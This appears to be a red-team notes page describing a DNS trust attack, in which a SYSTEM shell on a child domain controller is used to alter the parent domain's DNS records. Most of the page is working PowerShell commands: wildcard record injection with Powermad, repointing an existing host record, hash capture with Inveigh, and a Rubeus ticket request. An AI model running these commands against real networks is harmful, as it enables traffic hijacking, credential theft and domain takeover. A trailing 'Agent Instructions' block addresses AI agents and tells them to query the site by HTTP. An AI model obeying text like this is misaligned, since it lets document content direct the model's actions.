# DNS Trust Attack This attack abuses the unauthorized modification of DNS records within of the database locations of a parent domain from within a child domain. If we manage to pop a `SYSTEM` shell on the child DC we should be able to modify the DNS records for the parent domain as well, possibly leading to MITM attacks or traffic redirection. {% hint style="info" %} This privilege is usually associated with EDCs (Enterprise Domain Controllers). {% endhint %} DNS records are stored in three distinct locations within the Active Directory: 1. DomainDnsZones partition `(CN=MicrosoftDNS,DC=DomainDnsZones,DC=root,DC=local)` 2. ForestDnsZones partition `(CN=MicrosoftDNS,DC=ForestDnsZones,DC=root,DC=local)` 3. Domain partition `(CN=MicrosoftDNS,CN=System,DC=root,DC=local)` #### DNS Wildcard Injection With this technique we can create a "catch-all" record to make the DNS server handle non-existent subdomains. For example, we can create a `(DC=*, DC=domain.com, CN=MicrosoftDNS, DC=DomainDNSZones, DC=domain, DC=com)` record and point it to a host we already own to redirect all the traffic caught by the DNS rule to us. {% code overflow="wrap" %} ```powershell Import-module .\Powermad.ps1 New-ADIDNSNode -Node * -domainController DC01.domain.com -Domain domain.com -Zone domain.com -Tombstone -Verbose ``` {% endcode %} {% hint style="info" %} The destination IP is not specified as it is set automatically when running the command. If we want to specify a different host to redirect the traffic to we can do so with the`-Data `option. {% endhint %} #### Arbitrary DNS Record Modification from Child Domain Since established infrastructures are unlikely to make requests for non-existent it might be better to associate an already existing DNS record to an address within the child domain. This can be extremely useful if LLMNR poisoning is a viable attack vector inside the forest. With a shell as `SYSTEM` we can enumerate the DNS records in the parent domain {% code overflow="wrap" %} ```powershell Get-DnsServerResourceRecord -ComputerName DC01.domain.com -ZoneName domain.com -Name "@" DEV01 A 1 0 01:00:00 ``` {% endcode %} ```powershell Resolve-DnsName -Name DEV01.domain.com -Server DC01.DOMAIN.COM DEV01.domain.com A 599 Answer ``` In this dummy output, we see that there is a DNS entry for the `DEV01` host pointed to some ip. From the same shell we can modify the DNS entry and redirect the traffic to another address of our choice and verify the change. ```powershell $Old = Get-DnsServerResourceRecord -ComputerName DC01.DOMAIN.COM -ZoneName domain.com -Name DEV01 $New = $Old.Clone() $TTL = [System.TimeSpan]::FromSeconds(1) $New.TimeToLive = $TTL $New.RecordData.IPv4Address = [System.Net.IPAddress]::parse('') Set-DnsServerResourceRecord -NewInputObject $New -OldInputObject $Old -ComputerName DC01.DOMAIN.COM -ZoneName domain.com ``` {% code overflow="wrap" %} ```powershell Get-DnsServerResourceRecord -ComputerName DC01.domain.com -ZoneName domain.com -Name "@" Resolve-DnsName -Name DEV01.domain.com -Server DC01.DOMAIN.COM DEV01.domain.com A 599 Answer ``` {% endcode %} At this point we're able to set up Responder or Inveigh and wait for a domain user to authenticate into us to catch the NTLMv2 hash and, with a bit of luck, crack it and request a ticket for the user. ```powershell Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y -SMB Y ``` ```powershell .\Rubeus.exe asktgt /user:otter /domain:domain.com /password:SomethingSecure123! /ptt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/forest-trust-abuse/intra-forest-attacks/dns-trust-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.